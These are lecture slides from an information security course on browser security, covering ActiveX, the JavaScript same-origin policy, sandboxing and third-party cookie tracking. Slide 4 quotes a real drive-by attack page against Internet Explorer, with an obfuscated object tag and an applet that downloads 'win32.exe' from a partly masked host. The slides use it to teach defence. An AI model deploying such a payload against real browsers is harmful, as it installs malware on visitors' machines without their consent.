Title: Information Security CS 526 Lecture 31
1. Information Security CS 526, Lecture 31
- Web Browser Security Issues
2. Overview of Browser Security Issues
- Browsers communicate with the network and are complicated (i.e., buggy) software
- Browsers are ubiquitous
- Browsers are not subject to perimeter protection
- Browsers have many, many extensions
- Browsers run mobile code
  - to support active content
- Users use browsers to conduct critical transactions
  - browsers interact with users; users trust browsers
- Browsers maintain a lot of sensitive data
3. Browser and Network
[Figure: the browser, running on the OS and hardware, sends a request over the network to the web site and receives a reply]
- Browser sends requests
  - May reveal private information (in forms, cookies)
- Browser receives information, code
  - May corrupt state by running unsafe code
- Interaction susceptible to network attacks
  - Use HTTPS, which uses SSL/TLS
4. An Attack Incident Against IE Browser
- One click on a malicious URL
  - http://xxx.9x.xx8.8x/users/xxxx/xxx/laxx/z.html
- Result

  <html><head><title></title></head><body> <style>
  CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr") </style> <APPLET ARCHIVE='count.jar'
  CODE='BlackBox.class' WIDTH=1 HEIGHT=1> <PARAM
  NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET> <script> try { document.write('<object data=10911545105116115
  58 109104116109108581021051081
  0158 //C\fo''o.mht!''http://vxxxx''xxe.biz/
  /adv''erts//033//targ.ch' 'm/targ''et.htm
  type=text/x-scriptlet></ob''ject>') } catch(e) {}
  </script> </body></html>

Referenced Microsoft security bulletins: MS05-002, MS03-011, MS04-013
5. An Attack Incident Against IE Browser
- 22 unwanted programs are installed without the user's consent
6. Vulnerabilities in Browsers (According to Symantec Data)
7. Browsers Are Extensible
- Browser plugins
  - e.g., Acrobat, Adobe Flash, Apple QuickTime, MS Windows Media Player, Mozilla browser extensions, Opera Widgets, Sun Java
- ActiveX
  - allows applications or parts of applications to be utilized by the web browser
  - applications have full access to the operating system
  - web pages can use/download ActiveX components
8. Browser Plugin Vulnerabilities
9. Browsers Support Active Content
- JavaScript
  - embedded in web pages and executed inside the browser
- VBScript
  - similar to JavaScript, only for Windows
- Java applets
  - small pieces of Java bytecode that execute in browsers
10. Java Applet
[Figure: airline seat-selection applet. Download: the applet (seat map, airline data) is fetched and runs in a local window; local data: user profile, credit card; transmission: the selected seat is sent as an encrypted message]
11. HTML and Scripting

  <html>
  <p>
  <script>
  var num1, num2, sum;
  num1 = prompt("Enter first number");
  num2 = prompt("Enter second number");
  sum = parseInt(num1) + parseInt(num2);
  alert("Sum = " + sum);
  </script>
  </p>
  </html>

Browser receives content, displays HTML and executes scripts
12. Document Object Model (DOM)
- Object-oriented interface used to read and write web page documents
- Examples
  - Properties: document.alinkColor, document.URL, document.forms, document.links, document.anchors
  - Methods: document.write(document.referrer)
13. Security Risks Posed by Mobile Code
- Compromise host
  - Write to file system
  - Interfere with other processes in browser environment
- Steal information
  - Read file system
  - Read information associated with other browser processes (e.g., other windows)
- Fool the user
14. Need for Session State in Browsers
[Figure: View Catalog -> Select Item -> Check out, with the session data carried in each URL:
  www.e_buy.com
  www.e_buy.com/shopping.cfm?pID=269
  www.e_buy.com/shopping.cfm?pID=269&item=1102030405
  www.e_buy.com/checkout.cfm?pID=269&item=1102030405]
Storing session information in the URL: easily read on the network
15. Store Info Across Sessions?
- Cookies
  - A cookie is a file created by an Internet site to store information on your computer
[Figure: browser enters form data, server stores a cookie; later the server requests the cookie and the browser returns the data]
HTTP is a stateless protocol; cookies add state
16. Cookie
- A named text string stored by the browser
- Accessible as a property of the Document object
- Can be read and written entirely on the client side using JavaScript
- Used for authenticating, tracking, and maintaining specific information about users
  - e.g., site preferences, contents of shopping carts
- Data may be sensitive
- May be used to gather information about specific users
17. Security/Privacy Issues in Web Browsers
- How to securely run mobile code?
- How to provide access control to cookies and DOM objects?
- How to deal with privacy risks?
18. Approaches to Run Mobile Code
- Sandboxing
  - Code executed in the browser has only restricted access to OS, network
- Isolation: the same-origin principle
  - Only the site that stores some information in the browser may later read or modify that information (or depend on it in any way)
- Establish trust in the code
  - code digitally signed
19. Security Mechanisms for Effective Sandboxing
- Examine code before executing
  - Java bytecode verifier performs critical tests
- Interpret code and trap risky operations
  - Java bytecode interpreter does run-time tests
- Security manager applies local access policy
  - Security manager policy based on
    - Site that supplied the code
    - Code signing: who signed it?
20. Java Virtual Machine Architecture
[Figure: A.java is compiled by the Java compiler into A.class; the JVM passes classes (A.class locally, B.class from the network) through the loader, verifier and linker into the bytecode interpreter]
21. ActiveX
- ActiveX controls reside on the client's machine, activated by the HTML object tag on the page
- ActiveX controls are not interpreted by the browser
  - Compiled binaries executed by the client OS
  - Controls can be downloaded and installed
- Security model relies on three components
  - Digital signatures to verify the source of the binary
    - Authenticode
  - IE policy can reject controls from network zones
  - Controls marked by author as safe for initialization, safe for scripting, which affects the way the control is used
- Once accepted, installed and started, no control over execution
22. Installing Controls
If you install and run, there is no further control over the code.
In principle, the browser/OS could apply sandboxing or other techniques for containing risks in native code. But don't count on it.
23. Risks Associated with Controls
- MSDN warning
  - An ActiveX control can be an extremely insecure way to provide a feature
- Many have suggested disabling ActiveX
- Why?
  - It can do any user action
    - read and write Windows registry
    - access the local file system
  - Other web pages can attack a control
    - Once installed, a control can be accessed by any page
    - Page only needs to know the class identifier (CLSID)
- Recommendation: use other means if possible
http://msdn.microsoft.com/library/default.asp?url=/code/list/ie.asp
24. IE Browser Helper Objects (Extensions)
- COM components loaded when IE starts up
- Run in the same memory context as the browser
- Perform any action on IE windows and modules
  - Detect browser events
    - GoBack, GoForward, and DocumentComplete
  - Access browser menu, toolbar and make changes
  - Create windows to display additional information
  - Install hooks to monitor messages and actions
- Summary: no protection from extensions
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnwebgen/html/bho.asp
25. JavaScript Security Model
- Sandbox design (at least conceptually)
  - No direct file access or network access
- Same-origin policy
  - Can only read properties of documents and windows from the same place: server, protocol, port
- Access control with signed scripts
  - User can grant privileges to signed scripts
    - UniversalBrowserRead/Write
    - UniversalFileRead
    - UniversalSendMail
Reference: http://www.devarticles.com/c/a/JavaScript/JavaScript-Security/
26. Same-Origin Policy
- Applies to scripts that run in browsers
- Origin = domain name + protocol + port
  - all three must be equal for origins to be considered the same
  - however, some access is allowed for pages from the same domain, but not the same host
27. Examples, Assuming www.example.com
The same-origin check applies to access to the window object of other frames, etc.
28. Same-Origin Policy: Accesses It Controls
- Same-origin policy applies to the following accesses
  - manipulating browser windows
  - URLs requested via XMLHttpRequest
    - XMLHttpRequest is an API that can be used by web browser scripting languages to transfer XML and other text data to and from a web server using HTTP, by establishing an independent and asynchronous communication channel
    - used by AJAX
  - manipulating frames (including inline frames)
  - manipulating documents (including those included using the object tag)
  - manipulating cookies
29. Threats the Same-Origin Policy Intends to Deal With
- Impersonation of a legitimate user (session hijacking)
  - violating the trust a website places in a remote user, allowing the attacker to initiate HTTP requests in the context of the remote user or impersonate the remote user entirely
- Impersonation of a legitimate website (phishing)
  - violating the trust a user places in a remote site by impersonating the site in whole or in part
30. Same-Origin Policy: Exceptions, Issues, and Workarounds
- Parent domain traversal
  - x.y.com can set its domain to y.com
  - becomes problematic with international domains
    - consider co.uk
- Use of Flash browser plugins
  - allow cross-domain requests if permitted by a rule in crossdomain.xml
  - many vulnerabilities
31. Problems with the S-O Principle
- Poorly enforced on some browsers
  - particularly older browsers
- Limitations if a site hosts unrelated pages
  - Example: a web server often hosts sites for unrelated parties
    - http://www.example.com/account/
    - http://www.example.com/otheraccount/
  - The same-origin policy allows a script on one page to access properties of the document from the other
- Can be bypassed in cross-site scripting attacks
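The origin comparison from slide 26, the document.domain relaxation from slide 30 and the shared-host limitation from slide 31, written out as an added example (not code from the lecture). The public-suffix set, the `checkSuffix` switch and all host names are constructed for the example.

```javascript
// Added example (not from the lecture): a model of the same-origin check and
// of the document.domain relaxation ("parent domain traversal") on the slides.
// Origin = protocol + host + port; all three must be equal.
function originOf(urlString) {
  const u = new URL(urlString);
  // URL.port is "" for the default port, so make it explicit for comparison.
  const port = u.port || (u.protocol === "https:" ? "443" : "80");
  return { protocol: u.protocol, host: u.hostname, port };
}

function sameOrigin(urlA, urlB) {
  const a = originOf(urlA), b = originOf(urlB);
  return a.protocol === b.protocol && a.host === b.host && a.port === b.port;
}

// Constructed stand-in for a public-suffix list; browsers use a much larger
// list so that registry suffixes such as "co.uk" cannot be chosen as a domain.
const PUBLIC_SUFFIXES = new Set(["com", "edu", "org", "uk", "co.uk"]);

// May a page served from `host` set document.domain to `newDomain`?
// With checkSuffix=false this is the naive rule the slide calls problematic:
// shop.co.uk could set its domain to co.uk and share it with bank.co.uk.
function canSetDocumentDomain(host, newDomain, checkSuffix = true) {
  if (host === newDomain) return true;
  if (!host.endsWith("." + newDomain)) return false;  // must be a parent on a dot boundary
  return !(checkSuffix && PUBLIC_SUFFIXES.has(newDomain));
}

// After relaxation, two pages can script each other only if each may set
// document.domain to the same common value.
function relaxedSameOrigin(hostA, hostB, commonDomain, checkSuffix = true) {
  return canSetDocumentDomain(hostA, commonDomain, checkSuffix) &&
         canSetDocumentDomain(hostB, commonDomain, checkSuffix);
}
```

Note that the two paths on www.example.com from slide 31 compare as the same origin, which is exactly the limitation the slide describes.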
32. Browser Cookie Management
- Cookie same-origin ownership
  - Once a cookie is saved on your computer, only the web site that created the cookie can read it
- Variations
  - Temporary cookies
    - Stored until you quit your browser
  - Persistent cookies
    - Remain until deleted or expired
  - Third-party cookies
    - Originate on or are sent to a web site other than the one that provided the current page
33. Third-Party Cookies
- Get a page from merchant.com
  - Contains <img src="http://doubleclick.com/advt.gif">
- Image fetched from DoubleClick.com
  - DoubleClick knows your IP address and the page you were looking at
- DoubleClick sends back a suitable advertisement
  - Stores a cookie that identifies "you" at DoubleClick
- Next time you get a page with a doubleclick.com image
  - Your DoubleClick cookie is sent back to DoubleClick
  - DoubleClick could maintain the set of sites you viewed
  - Send back targeted advertising (and a new cookie)
- Cooperating sites
  - Can pass information to DoubleClick in URL,
34. Cookie Privacy Issues
- Cookies maintain a record of your browsing habits
  - Cookie stores information as a set of name/value pairs
  - May include any information a web site knows about you
- Sites track your activity from multiple visits to the site
- Sites can share this information (e.g., DoubleClick)
- Browser attacks could invade your privacy
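The cookie ownership rule of slide 32 and the third-party tracking flow of slides 33 and 34, as an added example (not code from the lecture). The cookie jar, the ad-server model and every host name and cookie value are constructed for the example; real cookie scoping also involves Domain and Path attributes, which this model leaves out.

```javascript
// Added example (not from the lecture): a tiny cookie jar that enforces "only
// the site that created a cookie can read it", plus an ad-server model showing
// how a third-party image still lets doubleclick.com link page views across
// unrelated first-party sites. Hosts and values are constructed.
class CookieJar {
  constructor() { this.cookies = []; }   // {domain, name, value, persistent}

  // Response from `responseHost` carried Set-Cookie: replace or add.
  setCookie(responseHost, name, value, persistent) {
    this.cookies = this.cookies.filter(c => !(c.domain === responseHost && c.name === name));
    this.cookies.push({ domain: responseHost, name, value, persistent });
  }

  // Cookie header for a request to `requestHost`: only that host's cookies.
  cookiesFor(requestHost) {
    return this.cookies.filter(c => c.domain === requestHost)
                       .map(c => `${c.name}=${c.value}`);
  }

  // Temporary cookies are dropped when the browser quits; persistent ones stay.
  quitBrowser() { this.cookies = this.cookies.filter(c => c.persistent); }
}

// Model of doubleclick.com: assigns an id on first sight, then logs
// (id, page the browser was looking at) for every later image fetch.
class AdServer {
  constructor() { this.nextId = 1; this.log = []; }
  handle(pageHost, cookieHeader) {
    const m = /(?:^|; )id=(\d+)/.exec(cookieHeader);
    const id = m ? m[1] : String(this.nextId++);
    this.log.push({ id, pageHost });
    return { name: "id", value: id, persistent: true };   // Set-Cookie, persistent
  }
}

// The browser loads a page from `pageHost` that embeds
// <img src="http://doubleclick.com/advt.gif">.
function visit(jar, ads, pageHost) {
  jar.setCookie(pageHost, "session", "s-" + pageHost, false);   // first-party, temporary
  const header = jar.cookiesFor("doubleclick.com").join("; "); // merchant's cookie is NOT here
  const set = ads.handle(pageHost, header);
  jar.setCookie("doubleclick.com", set.name, set.value, set.persistent);
}

// Sites the ad server can associate with one browser id.
function sitesSeenByAdServer(ads, id) {
  return ads.log.filter(e => e.id === id).map(e => e.pageHost);
}
```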
35. Coming Attractions